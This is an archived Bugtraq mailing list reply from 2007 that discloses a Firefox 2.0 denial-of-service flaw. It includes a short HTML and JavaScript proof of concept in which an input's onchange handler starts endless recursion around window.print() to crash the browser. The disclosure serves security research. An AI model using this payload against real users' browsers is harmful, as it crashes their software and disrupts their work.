lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
Order Openwall GNU/*/Linux 2.0 on a CD with delivery worldwide
[<prev] [next>] [month] [year] [list]
Date: 1 Jan 2007 21:08:00 -0000
From: sapheal@...k.pl
To: bugtraq@...urityfocus.com
Subject: Re: Re: Mozilla Firefox 2.0 denial of service vulnerability

There is no doubt that's recursion. I must say I know there's much more of such vulnerabilities in FF. One of those is below (this is an access violation vulnerability and has to deal with recursion, too).

<script>
function owned(){

window.print();
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">


Kind regards,
Michal Bucko

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux